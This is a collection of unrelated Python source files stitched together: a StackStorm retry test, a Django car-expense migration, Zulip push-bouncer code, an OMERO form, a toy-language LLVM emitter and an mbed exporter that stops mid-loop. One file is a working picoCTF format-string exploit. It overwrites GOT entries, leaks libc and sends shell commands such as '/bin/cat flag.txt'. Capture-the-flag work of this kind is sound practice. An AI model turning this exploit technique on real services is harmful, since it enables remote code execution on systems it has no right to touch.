self.policy.apply_after(target=live_action_db) # There should be two objects - original execution and retried execution live_action_dbs = LiveAction.get_all() action_execution_dbs = ActionExecution.get_all() self.assertEqual(len(live_action_dbs), 2) self.assertEqual(len(action_execution_dbs), 2) self.assertEqual(action_execution_dbs[0].status, LIVEACTION_STATUS_TIMED_OUT) self.assertEqual(action_execution_dbs[1].status, LIVEACTION_STATUS_REQUESTED) # Simulate success of second action so no it shouldn't be retried anymore live_action_db = live_action_dbs[1] live_action_db.status = LIVEACTION_STATUS_SUCCEEDED LiveAction.add_or_update(live_action_db) # Simulate policy "apply_after" run self.policy.apply_after(target=live_action_db) # There should be no new object since action succeeds so no retry was attempted live_action_dbs = LiveAction.get_all() action_execution_dbs = ActionExecution.get_all() self.assertEqual(len(live_action_dbs), 2) self.assertEqual(len(action_execution_dbs), 2) self.assertEqual(live_action_dbs[0].status, LIVEACTION_STATUS_TIMED_OUT) self.assertEqual(live_action_dbs[1].status, LIVEACTION_STATUS_SUCCEEDED) def test_retry_on_timeout_max_retries_reached(self): # Verify initial state self.assertSequenceEqual(LiveAction.get_all(), []) self.assertSequenceEqual(ActionExecution.get_all(), []) # Start a mock action which times out liveaction = LiveActionDB(action='wolfpack.action-1', parameters={'actionstr': 'foo'}) live_action_db, execution_db = action_service.request(liveaction) live_action_db.status = LIVEACTION_STATUS_TIMED_OUT live_action_db.context['policies'] = {} live_action_db.context['policies']['retry'] = {'retry_count': 2} execution_db.status = LIVEACTION_STATUS_TIMED_OUT LiveAction.add_or_update(live_action_db) ActionExecution.add_or_update(execution_db) # Simulate policy "apply_after" run self.policy.apply_after(target=live_action_db) # Note: There should be no new objects since max retries has been reached live_action_dbs = LiveAction.get_all() action_execution_dbs = ActionExecution.get_all() self.assertEqual(len(live_action_dbs), 1) self.assertEqual(len(action_execution_dbs), 1) self.assertEqual(action_execution_dbs[0].status, LIVEACTION_STATUS_TIMED_OUT)
# -*- coding: utf-8 -*- # Generated by Django 1.11.2 on 2017-07-07 21:02 from __future__ import unicode_literals from django.db import migrations, models import django.db.models.deletion import django.utils.timezone class Migration(migrations.Migration): initial = True dependencies = [ ] operations = [ migrations.CreateModel( name='Consommation', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('odometre', models.IntegerField()), ('quantite_essence', models.DecimalField(decimal_places=2, max_digits=5)), ('date_conso', models.DateField(default=django.utils.timezone.now)), ('prix_litre', models.DecimalField(decimal_places=2, max_digits=6)), ], ), migrations.CreateModel( name='Entretien', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('description', models.CharField(max_length=100)), ('montant', models.DecimalField(decimal_places=2, max_digits=5)), ('date_frais', models.DateField(default=django.utils.timezone.now)), ], ), migrations.CreateModel( name='Voiture', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('marque', models.CharField(max_length=20)), ('type', models.CharField(max_length=20)), ('annee', models.IntegerField()), ('petit_nom', models.CharField(max_length=20)), ('odometre_depart', models.IntegerField()), ('date_achat', models.DateField(default=django.utils.timezone.now)), ('cout_achat', models.DecimalField(decimal_places=2, max_digits=8)), ], ), migrations.AddField( model_name='entretien', name='voiture', field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='voiture.Voiture'), ), migrations.AddField( model_name='consommation', name='voiture', field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='voiture.Voiture'), ), ]
import logging import urllib from typing import Any, Dict, List, Mapping, Tuple, Union import orjson import requests from django.conf import settings from django.forms.models import model_to_dict from django.utils.translation import gettext as _ from analytics.models import InstallationCount, RealmCount from version import ZULIP_VERSION from zerver.lib.exceptions import JsonableError from zerver.lib.export import floatify_datetime_fields from zerver.models import RealmAuditLog class PushNotificationBouncerException(Exception): pass class PushNotificationBouncerRetryLaterError(JsonableError): http_status_code = 502 def send_to_push_bouncer( method: str, endpoint: str, post_data: Union[bytes, Mapping[str, Union[str, bytes]]], extra_headers: Mapping[str, str] = {}, ) -> Dict[str, object]: """While it does actually send the notice, this function has a lot of code and comments around error handling for the push notifications bouncer. There are several classes of failures, each with its own potential solution: * Network errors with requests.request. We raise an exception to signal it to the callers. * 500 errors from the push bouncer or other unexpected responses; we don't try to parse the response, but do make clear the cause. * 400 errors from the push bouncer. Here there are 2 categories: Our server failed to connect to the push bouncer (should throw) vs. client-side errors like and invalid token. """ url = urllib.parse.urljoin( settings.PUSH_NOTIFICATION_BOUNCER_URL, "/api/v1/remotes/" + endpoint ) api_auth = requests.auth.HTTPBasicAuth(settings.ZULIP_ORG_ID, settings.ZULIP_ORG_KEY) headers = {"User-agent": f"ZulipServer/{ZULIP_VERSION}"} headers.update(extra_headers) try: res = requests.request( method, url, data=post_data, auth=api_auth, timeout=30, verify=True, headers=headers ) except ( requests.exceptions.Timeout, requests.exceptions.SSLError, requests.exceptions.ConnectionError, ) as e: raise PushNotificationBouncerRetryLaterError( f"{e.__class__.__name__} while trying to connect to push notification bouncer" ) if res.status_code >= 500: # 500s should be resolved by the people who run the push # notification bouncer service, and they'll get an appropriate # error notification from the server. We raise an exception to signal # to the callers that the attempt failed and they can retry. error_msg = "Received 500 from push notification bouncer" logging.warning(error_msg) raise PushNotificationBouncerRetryLaterError(error_msg) elif res.status_code >= 400: # If JSON parsing errors, just let that exception happen result_dict = orjson.loads(res.content) msg = result_dict["msg"] if "code" in result_dict and result_dict["code"] == "INVALID_ZULIP_SERVER": # Invalid Zulip server credentials should email this server's admins raise PushNotificationBouncerException( _("Push notifications bouncer error: {}").format(msg) ) else: # But most other errors coming from the push bouncer # server are client errors (e.g. never-registered token) # and should be handled as such. raise JsonableError(msg) elif res.status_code != 200: # Anything else is unexpected and likely suggests a bug in # this version of Zulip, so we throw an exception that will # email the server admins. raise PushNotificationBouncerException( f"Push notification bouncer returned unexpected status code {res.status_code}" ) # If we don't throw an exception, it's a successful bounce! return orjson.loads(res.content) def send_json_to_push_bouncer(method: str, endpoint: str, post_data: Mapping[str, object]) -> None: send_to_push_bouncer( method, endpoint, orjson.dumps(post_data), extra_headers={"Content-type": "application/json"}, ) REALMAUDITLOG_PUSHED_FIELDS = [ "id", "realm", "event_time", "backfilled", "extra_data", "event_type", ] def build_analytics_data( realm_count_query: Any, installation_count_query: Any, realmauditlog_query: Any ) -> Tuple[List[Dict[str, Any]], List[Dict[str, Any]], List[Dict[str, Any]]]: # We limit the batch size on the client side to avoid OOM kills timeouts, etc. MAX_CLIENT_BATCH_SIZE = 10000 data = {} data["analytics_realmcount"] = [ model_to_dict(row) for row in realm_count_query.order_by("id")[0:MAX_CLIENT_BATCH_SIZE] ] data["analytics_installationcount"] = [ model_to_dict(row) for row in installation_count_query.order_by("id")[0:MAX_CLIENT_BATCH_SIZE] ] data["zerver_realmauditlog"] = [ model_to_dict(row, fields=REALMAUDITLOG_PUSHED_FIELDS) for row in realmauditlog_query.order_by("id")[0:MAX_CLIENT_BATCH_SIZE] ] floatify_datetime_fields(data, "analytics_realmcount") floatify_datetime_fields(data, "analytics_installationcount") floatify_datetime_fields(data, "zerver_realmauditlog") return ( data["analytics_realmcount"], data["analytics_installationcount"], data["zerver_realmauditlog"], ) def send_analytics_to_remote_server() -> None: # first, check what's latest try: result = send_to_push_bouncer("GET", "server/analytics/status", {}) except PushNotificationBouncerRetryLaterError as e: logging.warning(e.msg) return last_acked_realm_count_id = result["last_realm_count_id"] last_acked_installation_count_id = result["last_installation_count_id"] last_acked_realmauditlog_id = result["last_realmauditlog_id"] (realm_count_data, installation_count_data, realmauditlog_data) = build_analytics_data( realm_count_query=RealmCount.objects.filter(id__gt=last_acked_realm_count_id), installation_count_query=InstallationCount.objects.filter( id__gt=last_acked_installation_count_id ), realmauditlog_query=RealmAuditLog.objects.filter( event_type__in=RealmAuditLog.SYNCED_BILLING_EVENTS, id__gt=last_acked_realmauditlog_id ), ) if len(realm_count_data) + len(installation_count_data) + len(realmauditlog_data) == 0: return request = { "realm_counts": orjson.dumps(realm_count_data).decode(), "installation_counts": orjson.dumps(installation_count_data).decode(), "realmauditlog_rows": orjson.dumps(realmauditlog_data).decode(), "version": orjson.dumps(ZULIP_VERSION).decode(), } # Gather only entries with an ID greater than last_realm_count_id try: send_to_push_bouncer("POST", "server/analytics", request) except JsonableError as e: logging.warning(e.msg)
#!/usr/bin/env python # -*- coding: utf-8 -*- # # Copyright (C) 2011-2014 University of Dundee & Open Microscopy Environment. # All rights reserved. # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU Affero General Public License as # published by the Free Software Foundation, either version 3 of the # License, or (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU Affero General Public License for more details. # # You should have received a copy of the GNU Affero General Public License # along with this program. If not, see <http://www.gnu.org/licenses/>. # from django import forms from django.utils.encoding import smart_str from django.forms.util import ErrorDict, ValidationError from django.forms.fields import FileField, CharField class NonASCIIForm(forms.Form): def __init__(self, *args, **kwargs): super(NonASCIIForm, self).__init__(*args, **kwargs) def full_clean(self): """ Cleans all of self.data and populates self._errors and self.cleaned_data. """ self._errors = ErrorDict() if not self.is_bound: # Stop further processing. return self.cleaned_data = {} # If the form is permitted to be empty, and none of the form data has # changed from the initial data, short circuit any validation. if self.empty_permitted and not self.has_changed(): return for name, field in self.fields.items(): # value_from_datadict() gets the data from the data dictionaries. # Each widget type knows how to retrieve its own data, because # some widgets split data over several HTML fields. value = field.widget.value_from_datadict( self.data, self.files, self.add_prefix(name)) try: if isinstance(field, FileField): initial = self.initial.get(name, field.initial) value = field.clean(value, initial) elif isinstance(field, CharField): if (value is not None and isinstance(value, basestring) and len(value) > 0): value = str(smart_str(value)) else: value = field.clean(value) else: value = field.clean(value) self.cleaned_data[name] = value if hasattr(self, 'clean_%s' % name): value = getattr(self, 'clean_%s' % name)() self.cleaned_data[name] = value except ValidationError, e: self._errors[name] = self.error_class(e.messages) if name in self.cleaned_data: del self.cleaned_data[name] try: self.cleaned_data = self.clean() except ValidationError, e: self._errors[forms.Form.NON_FIELD_ERRORS] = \ self.error_class(e.messages) if self._errors: delattr(self, 'cleaned_data')
import struct, time from socket import * def recv_timeout(the_socket,timeout=2): the_socket.setblocking(0) total_data=[]; data=''; begin=time.time() while 1: if total_data and time.time()-begin > timeout: break elif time.time()-begin > timeout*2: break try: data = the_socket.recv(8192) if data: total_data.append(data) begin = time.time() else: time.sleep(0.1) except: pass the_socket.setblocking(1) return ''.join(total_data) def indicator(exploit): return "ABCD"+exploit+"EFGH" def value(reply): start = reply.index("ABCD")+4 end = reply.index("EFGH") return reply[start:end] s = socket(AF_INET, SOCK_STREAM) s.connect(('shell2017.picoctf.com', 44887)) #PAYLOAD 1: Write PRINTF_PLT to a location #134519023 exploit = "%134519023x%9$n" s.send(exploit+'\n') recv_timeout(s) #print s.recv(4096) #DEBUG 1: Read Written Data exploit = indicator("%16$x") s.send(exploit+'\n') print value(s.recv(2048)) #Should print 0x08049970 #PAYLOAD 2: Get the 'printf' libc address exploit = indicator("%16$s") s.send(exploit+'\n') data = value(s.recv(2048)) data = data[0:4] printf_libc ='' for c in data: printf_libc = hex(ord(c))[2:] + printf_libc print printf_libc #Calculate base libc address base_libc = int(printf_libc, 16) - 0x4cc70 print hex(base_libc) #Calculate 'system' libc address system_libc = base_libc + 0x3e3e0 print hex(system_libc) #PAYLOAD 3: Write STRLEN_PLT to a location #39151, 39155, 39167, 39171, 39179 exploit = "%39167x%9$hn" s.send(exploit+'\n') recv_timeout(s) #print s.recv(4096) #DEBUG 3: Read Written Data exploit = indicator("%16$x") s.send(exploit+'\n') print value(s.recv(2048)) #Should print 0x804998c #PAYLOAD 4: Overwrite the 'strlen' with 'system' portion = system_libc // 10 remainder = system_libc % 10 exploit = "; /bin/cat flag.txt #" exploit += ("%"+str(portion)+"x")*9 exploit += "%"+str(portion+remainder-150)+"x%16$n" s.send(exploit+'\n') data = recv_timeout(s) print "".join(data.split()) #PAYLOAD 5: Execute shell commands print "Sending Final Payload" exploit = "; /bin/ls #" s.send(exploit+'\n') data = recv_timeout(s) print "".join(data.split()) print "Completed" s.close()
import grammar import contextlib import collections import util import datamodel import copy import os import functools #Underlying machinery for tracking TU state and emitting LLVM code. class Variable: #Holds a LLVM identifier, OType pair def __init__(self, var, type): self.name=var self.type=type def __str__(self): return "Var({} {})".format(self.type, self.name) def __repr__(self): return str(self) class Emitter: #Workhorse of the actual emitting process. Passed around as out so as to be theoretically reentrant. #Tracks variables, globals, function prototypes, included files, contexts (indent etc), scopes class _IndentContext: #Helper so that one can write #with out.context(): # #Do something #Just pops the last context off the context map chain when it returns (if no error) def __init__(self, emitter): self.emitter=emitter def __enter__(self): pass def __exit__(self, type, value, traceback): if traceback: return del self.emitter.context_map.maps[0] class _ScopeContext: #Same as above, but for scope def __init__(self, emitter): self.emitter=emitter def __enter__(self): pass def __exit__(self, type, value, traceback): if traceback: return del self.emitter.scopes.maps[0] def __init__(self, fd, options): #Construct an emitter, outputting to the file fd self.fd=fd self.indent_context_manager=Emitter._IndentContext(self) self.scope_context_manager=Emitter._ScopeContext(self) #The context chainmap is a series of maps, where the current state # (file, line, class, method, etc) is readable by indexing into the # chain. This allows nested contexts, for example a method in a class # in a included file in an included file in an included file, and for # it all to be sorted out at the end of those scopes. #Create a scope by doing #with emitter.scope(line=foo, file=bar, method=baz): # #Do stuff that will call emitter.emit* # and then the emitted lines will have the correct context/debugging # info attached self.context_map=collections.ChainMap({ "indent":0, "line":"u", "file":"u", "ns":"u", "class":"u", "method":"u", "astblock":"u", "path":"./" }) self.temp_count=0 #Number of temporary (for SSA) variables we've allocated self.last_line=-1 #Debug helper self.last_file=-1 #Debug helper self.last_method=-1 #Debug helper self.options=options #Same idea as the context maps. Provides a stack of orth_var_name:Variable # mappings that (as a virtue of being a stack) respects local declarations over # global names) #Contains global variables in the last element in the chain (scopes.maps[-1]) self.scopes=collections.ChainMap({}) self.signatures={} #Map of name->Variable for functions self.global_statments=[] #Stuff to stick at the end of the file (e.g. string literals) self.included_files=[] #Files whose contents have actually been emitted self.prepared_files=[] #Files whose prototypes/globals have been emitted, and signatures loaded #(all files will have that preparation transformation applied before _any_ are actually # "included") self.defined_files=[] self.ast_cache={} #Cache of filename (non-mangled)->ASTNode for files self.path_cache={} #Cache of include_name->File path for imports self.types=copy.copy(datamodel.builtin_types) #Dictionary of orth_type_name:OTypes of the types availible (globally) #in the program self.searchpath=["."] #Search path for imported modules (using import name, as opposed to import "relative_path") self.startup_functions=[] if not options.get("no0double", False): self.emitl("@_the_zero_double = global double 0.0") if "path" in options: self.searchpath=options["path"] def emit(self, text): self.fd.write(text) def emitindent(self): self.emit("\t"*self.context_map['indent']) def emitl(self, line): self.emitindent() self.emit(line) self.emit("\t\t;from "+self.context_map['file']+":"+str(self.context_map['line'])) self.emit("\n") def context(self, indent_by=1, **kwargs): #Create and push a context on to the context map chain stack. Automatically indents +1 if not otherwise specified if 'indent' not in kwargs: kwargs['indent']=self.context_map['indent']+indent_by self.context_map.maps.insert(0, kwargs) self.last_line=self.context_map["line"] self.last_file=self.context_map["file"] self.last_method=self.context_map["method"] return self.indent_context_manager #This function returns a context manager that automatically pops the context when the block ends def indent(self, by=1): return self.context(indent_by=by) def get_name(self): #Get a non-conficting SSA name self.temp_count+=1 return "f{}_m{}_l{}_n{}".format( self.context_map['file'], self.context_map['method'], self.context_map['line'], self.temp_count ) def get_temp_name(self): #Get a non-conflicting SSA name for an intermidiate variable return "temp_"+self.get_name() def scope(self): #Create a scope and push it onto the scope chain map stack self.scopes.maps.insert(0, {}) return self.scope_context_manager def set_var_name(self, vname, aname, type): #Create a variable (in the topmost scope) and register it's type self.scopes.maps[0][vname]=Variable(aname, type) def set_signature(self, fname, type): self.signatures[fname]=Variable("@"+fname, type) def set_global_var_name(self, vname, aname, type): #Create a global and register it's type self.scopes.maps[-1][vname]=Variable(aname, type) def get_var_name(self, vname): #Get the llvm identifer for a variable (returns the identifier (which never # shadow each other) of the variable in the topmost scope containing one named # `vname`) return self.scopes[vname].name def get_var_type(self, vname): #Same behavior as get_var_name, but returns the OType of the variable return self.scopes[vname].type def get_var(self, vname): #Same behavior as get_var_name, but returns the whole Variable object return self.scopes[vname] def add_global_stmt(self, text): #Stick a glbal statment for emitting at the end onto the list (e.g. string literals) self.global_statments.append(text) def emit_global_statments(self): #Emit all the cached global statments for stmt in self.global_statments: self.emitl(stmt) #Mapping of ASTNode type -> Transformer type #Is a one-to-one mapping, but in some cases a transformer may match a more specific subclass of a ASTNode than another # (in that case we always want the more specific match) transformers={} class TransformerMeta(type): #Metaclass for transformers that registers it def __new__(self, name, bases, classdict): cls = type.__new__(self, name, bases, classdict) if cls.transforms is not None: if isinstance(cls.transforms, list): for nodetype in cls.transforms: transformers[nodetype]=cls else: transformers[cls.transforms]=cls return cls class Transformer(metaclass=TransformerMeta): transforms=None #This is either a single ASTNode subclass or a list of them that this Transofmrer is capable of matching def __init__(self, node, parent): self.node=node self.parent=parent def transform(self, out): #Returns a LLVM identifier string for the value of this ASTNode (assuming it has one) otherwise None pass def transform_address(self, out): #Required for stuff that can be the LHS of an AssignmentExpr. Should return a LLVM identifier string # for a local variable of type <get_type()>*, reffering to the memory address of the location it's value # is stored at pass def prepare(self, out): #Not required. For functiondecls and global decls, and file this will be called at import-resolution time # (as opposed to include-time) and should be used to declare types and variables etc pass @staticmethod def get_type(node, out): #Returns a OType that is the type of the variable returned by transform() pass def get_transformer_cls(node): match=None for item in transformers.keys(): if isinstance(node, item) and (match is None or issubclass(item, match)): match=item if match is None: raise IndexError("No transformer for %s of type %s"%(str(node), str(type(node)))) return transformers[match] def get_transformer(node, parent): return get_transformer_cls(node)(node, parent) def emit(out, node, parent=None): return get_transformer(node, parent).transform(out) def emit_project(out, node, parent=None): get_transformer(node, parent).define(out) get_transformer(node, parent).prepare(out) return get_transformer(node, parent).transform(out) def get_type(node, out): if isinstance(node, str): return out.types[node] if isinstance(node, datamodel.OType): return node res = get_transformer_cls(node).get_type(node, out) if isinstance(res, datamodel.OType): return res return out.types[res] def do_var_alloc(out, varname, type): name="var_"+out.get_name()+"___"+varname out.emitl("%{} = alloca {}".format(name, type.get_llvm_representation())) out.set_var_name(varname, "%"+name, type) return "%"+name def call_func(name, argtypes, args, out): arg_values=[] for idx, arg in enumerate(args): arg_values.append(argtypes[idx]+" "+arg) return "call {} @{}({}) ;call_func".format( out.signatures[name].type.get_llvm_representation(), name, ",".join(arg_values) ) def resolve_import(import_node, out): if import_node.absolute: return import_node.identifier.replace("$",os.path.dirname(out.context_map["path"])) else: if import_node.identifier in out.path_cache: return out.path_cache[import_node.identifier] for dir in out.searchpath: if os.path.isdir(dir): if import_node.identifier+".ort" in os.listdir(dir): result=os.path.join(dir, import_node.identifier+".ort") out.path_cache[import_node.identifier]=result return result elif import_node.identifier in os.listdir(dir): result=os.path.join(os.path.join(dir, import_node.identifier), "__init__.ort") out.path_cache[import_node.identifier]=result return result raise ImportError("No module `%s' found on search path"%import_node.identifier) def sanitize_fn(fn): return fn.strip().replace(".ort","").replace("/","").replace(".","").replace("\\","").replace(" ","") def ret_local(fn): #Wrap a transform or transform_addres function that returns the name of a local SSA ariable # sans-% and adds one. @functools.wraps(fn) def _wrapped(*a, **k): return "%"+fn(*a, **k) return _wrapped
""" mbed SDK Copyright (c) 2011-2017 ARM Limited Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. """ from __future__ import print_function, absolute_import from builtins import str from os.path import splitext, basename, relpath, join import shutil from tools.utils import mkdir from tools.export.gnuarmeclipse import GNUARMEclipse from tools.export.gnuarmeclipse import UID from tools.build_api import prepare_toolchain from tools.targets import TARGET_MAP from sys import flags, platform # Global random number generator instance. u = UID() class Sw4STM32(GNUARMEclipse): """ Sw4STM32 class """ NAME = 'Sw4STM32' TOOLCHAIN = 'GCC_ARM' BOARDS = { 'B96B_F446VE': { 'name': 'B96B-F446VE', 'mcuId': 'STM32F446VETx' }, 'DISCO_F051R8': { 'name': 'STM32F0DISCOVERY', 'mcuId': 'STM32F051R8Tx' }, 'DISCO_F303VC': { 'name': 'STM32F3DISCOVERY', 'mcuId': 'STM32F303VCTx' }, 'DISCO_F334C8': { 'name': 'STM32F3348DISCOVERY', 'mcuId': 'STM32F334C8Tx' }, 'DISCO_F401VC': { 'name': 'STM32F401C-DISCO', 'mcuId': 'STM32F401VCTx' }, 'DISCO_F407VG': { 'name': 'STM32F4DISCOVERY', 'mcuId': 'STM32F407VGTx' }, 'DISCO_F413ZH': { 'name': 'DISCO_F413', 'mcuId': 'STM32F413ZHTx' }, 'DISCO_F429ZI': { 'name': 'STM32F429I-DISCO', 'mcuId': 'STM32F429ZITx' }, 'DISCO_F469NI': { 'name': 'DISCO-F469NI', 'mcuId': 'STM32F469NIHx' }, 'DISCO_F746NG': { 'name': 'STM32F746G-DISCO', 'mcuId': 'STM32F746NGHx' }, 'DISCO_F769NI': { 'name': 'DISCO-F769NI', 'mcuId': 'STM32F769NIHx' }, 'DISCO_L053C8': { 'name': 'STM32L0538DISCOVERY', 'mcuId': 'STM32L053C8Tx' }, 'DISCO_L072CZ_LRWAN1': { 'name': 'DISCO-L072CZ-LRWAN1', 'mcuId': 'STM32L072CZTx' }, 'MTB_MURATA_ABZ': { 'name': 'MTB-MURATA-ABZ', 'mcuId': 'STM32L0x2xZ' }, 'DISCO_L475VG_IOT01A': { 'name': 'STM32L475G-DISCO', 'mcuId': 'STM32L475VGTx' }, 'DISCO_L476VG': { 'name': 'STM32L476G-DISCO', 'mcuId': 'STM32L476VGTx' }, 'NUCLEO_F030R8': { 'name': 'NUCLEO-F030R8', 'mcuId': 'STM32F030R8Tx' }, 'NUCLEO_F031K6': { 'name': 'NUCLEO-F031K6', 'mcuId': 'STM32F031K6Tx' }, 'NUCLEO_F042K6': { 'name': 'NUCLEO-F042K6', 'mcuId': 'STM32F042K6Tx' }, 'NUCLEO_F070RB': { 'name': 'NUCLEO-F070RB', 'mcuId': 'STM32F070RBTx' }, 'NUCLEO_F072RB': { 'name': 'NUCLEO-F072RB', 'mcuId': 'STM32F072RBTx' }, 'NUCLEO_F091RC': { 'name': 'NUCLEO-F091RC', 'mcuId': 'STM32F091RCTx' }, 'NUCLEO_F103RB': { 'name': 'NUCLEO-F103RB', 'mcuId': 'STM32F103RBTx' }, 'NUCLEO_F207ZG': { 'name': 'NUCLEO-F207ZG', 'mcuId': 'STM32F207ZGTx' }, 'NUCLEO_F302R8': { 'name': 'NUCLEO-F302R8', 'mcuId': 'STM32F302R8Tx' }, 'NUCLEO_F303K8': { 'name': 'NUCLEO-F303K8', 'mcuId': 'STM32F303K8Tx' }, 'NUCLEO_F303RE': { 'name': 'NUCLEO-F303RE', 'mcuId': 'STM32F303RETx' }, 'NUCLEO_F303ZE': { 'name': 'NUCLEO-F303ZE', 'mcuId': 'STM32F303ZETx' }, 'NUCLEO_F334R8': { 'name': 'NUCLEO-F334R8', 'mcuId': 'STM32F334R8Tx' }, 'NUCLEO_F401RE': { 'name': 'NUCLEO-F401RE', 'mcuId': 'STM32F401RETx' }, 'NUCLEO_F410RB': { 'name': 'NUCLEO-F410RB', 'mcuId': 'STM32F410RBTx' }, 'NUCLEO_F411RE': { 'name': 'NUCLEO-F411RE', 'mcuId': 'STM32F411RETx' }, 'NUCLEO_F413ZH': { 'name': 'NUCLEO-F413ZH', 'mcuId': 'STM32F413ZHTx' }, 'NUCLEO_F429ZI': { 'name': 'NUCLEO-F429ZI', 'mcuId': 'STM32F429ZITx' }, 'NUCLEO_F446RE': { 'name': 'NUCLEO-F446RE', 'mcuId': 'STM32F446RETx' }, 'NUCLEO_F446ZE': { 'name': 'NUCLEO-F446ZE', 'mcuId': 'STM32F446ZETx' }, 'NUCLEO_F746ZG': { 'name': 'NUCLEO-F746ZG', 'mcuId': 'STM32F746ZGTx' }, 'NUCLEO_F767ZI': { 'name': 'NUCLEO-F767ZI', 'mcuId': 'STM32F767ZITx' }, 'NUCLEO_L011K4': { 'name': 'NUCLEO-L011K4', 'mcuId': 'STM32L011K4Tx' }, 'NUCLEO_L031K6': { 'name': 'NUCLEO-L031K6', 'mcuId': 'STM32L031K6Tx' }, 'NUCLEO_L053R8': { 'name': 'NUCLEO-L053R8', 'mcuId': 'STM32L053R8Tx' }, 'NUCLEO_L073RZ': { 'name': 'NUCLEO-L073RZ', 'mcuId': 'STM32L073RZTx' }, 'MTB_RAK811': { 'name': 'MTB-RAK-811', 'mcuId': 'STM32L151CBUxA' }, 'NUCLEO_L152RE': { 'name': 'NUCLEO-L152RE', 'mcuId': 'STM32L152RETx' }, 'NUCLEO_L432KC': { 'name': 'NUCLEO-L432KC', 'mcuId': 'STM32L432KCUx' }, 'MTB_ADV_WISE_1510': { 'name': 'MTB-ADV-WISE-1510', 'mcuId': 'STM32L443xC' }, 'NUCLEO_L476RG': { 'name': 'NUCLEO-L476RG', 'mcuId': 'STM32L476RGTx' }, 'NUCLEO_L486RG': { 'name': 'NUCLEO-L486RG', 'mcuId': 'STM32L486RGTx' }, 'NUCLEO_L496ZG': { 'name': 'NUCLEO-L496ZG', 'mcuId': 'STM32L496ZGTx' }, 'NUCLEO_L496ZG_P': { 'name': 'NUCLEO-L496ZG', 'mcuId': 'STM32L496ZGTx' }, 'NUCLEO_L4R5ZI': { 'name': 'NUCLEO-L4R5ZI', 'mcuId': 'STM32L4R5ZITx' } } @classmethod def is_target_supported(cls, target_name): target = TARGET_MAP[target_name] target_supported = bool(set(target.resolution_order_names) .intersection(set(cls.BOARDS.keys()))) toolchain_supported = cls.TOOLCHAIN in target.supported_toolchains return target_supported and toolchain_supported def __gen_dir(self, dir_name): """ Method that creates directory """ settings = join(self.export_dir, dir_name) mkdir(settings) def get_fpu_hardware(self, fpu_unit): """ Convert fpu unit name into hardware name. """ hw = '' fpus = { 'fpv4spd16': 'fpv4-sp-d16', 'fpv5d16': 'fpv5-d16', 'fpv5spd16': 'fpv5-sp-d16' } if fpu_unit in fpus: hw = fpus[fpu_unit] return hw def process_sw_options(self, opts, flags_in): """ Process System Workbench specific options. System Workbench for STM32 has some compile options, which are not recognized by the GNUARMEclipse exporter. Those are handled in this method. """ opts['c']['preprocess'] = False if '-E' in flags_in['c_flags']: opts['c']['preprocess'] = True opts['cpp']['preprocess'] = False if '-E' in flags_in['cxx_flags']: opts['cpp']['preprocess'] = True opts['c']['slowflashdata'] = False if '-mslow-flash-data' in flags_in['c_flags']: opts['c']['slowflashdata'] = True opts['cpp']['slowflashdata'] = False if '-mslow-flash-data' in flags_in['cxx_flags']: opts['cpp']['slowflashdata'] = True if opts['common']['optimization.messagelength']: opts['common']['optimization.other'] += ' -fmessage-length=0' if opts['common']['optimization.signedchar']: opts['common']['optimization.other'] += ' -fsigned-char' if opts['common']['optimization.nocommon']: opts['common']['optimization.other'] += ' -fno-common' if opts['common']['optimization.noinlinefunctions']: opts['common']['optimization.other'] += ' -fno-inline-functions' if opts['common']['optimization.freestanding']: opts['common']['optimization.other'] += ' -ffreestanding' if opts['common']['optimization.nobuiltin']: opts['common']['optimization.other'] += ' -fno-builtin' if opts['common']['optimization.spconstant']: opts['common']['optimization.other'] += ' -fsingle-precision-constant' if opts['common']['optimization.nomoveloopinvariants']: opts['common']['optimization.other'] += ' -fno-move-loop-invariants' if opts['common']['warnings.unused']: opts['common']['warnings.other'] += ' -Wunused' if opts['common']['warnings.uninitialized']: opts['common']['warnings.other'] += ' -Wuninitialized' if opts['common']['warnings.missingdeclaration']: opts['common']['warnings.other'] += ' -Wmissing-declarations' if opts['common']['warnings.pointerarith']: opts['common']['warnings.other'] += ' -Wpointer-arith' if opts['common']['warnings.padded']: opts['common']['warnings.other'] += ' -Wpadded' if opts['common']['warnings.shadow']: opts['common']['warnings.other'] += ' -Wshadow' if opts['common']['warnings.logicalop']: opts['common']['warnings.other'] += ' -Wlogical-op' if opts['common']['warnings.agreggatereturn']: opts['common']['warnings.other'] += ' -Waggregate-return' if opts['common']['warnings.floatequal']: opts['common']['warnings.other'] += ' -Wfloat-equal' opts['ld']['strip'] = False if '-s' in flags_in['ld_flags']: opts['ld']['strip'] = True opts['ld']['shared'] = False if '-shared' in flags_in['ld_flags']: opts['ld']['shared'] = True opts['ld']['soname'] = '' opts['ld']['implname'] = '' opts['ld']['defname'] = '' for item in flags_in['ld_flags']: if item.startswith('-Wl,-soname='): opts['ld']['soname'] = item[len('-Wl,-soname='):] if item.startswith('-Wl,--out-implib='): opts['ld']['implname'] = item[len('-Wl,--out-implib='):] if item.startswith('-Wl,--output-def='): opts['ld']['defname'] = item[len('-Wl,--output-def='):] opts['common']['arm.target.fpu.hardware'] = self.get_fpu_hardware( opts['common']['arm.target.fpu.unit']) opts['common']['debugging.codecov'] = False if '-fprofile-arcs' in flags_in['common_flags'] and '-ftest-coverage' in flags_in['common_flags']: opts['common']['debugging.codecov'] = True # Passing linker options to linker with '-Wl,'-prefix. for index in range(len(opts['ld']['flags'])): item = opts['ld']['flags'][index] if not item.startswith('-Wl,'): opts['ld']['flags'][index] = '-Wl,' + item # Strange System Workbench feature: If first parameter in Other flags is a # define (-D...), Other flags will be replaced by defines and other flags # are completely ignored. Moving -D parameters to defines. for compiler in ['c', 'cpp', 'as']: tmpList = opts[compiler]['other'].split(' ') otherList = [] for item in tmpList: if 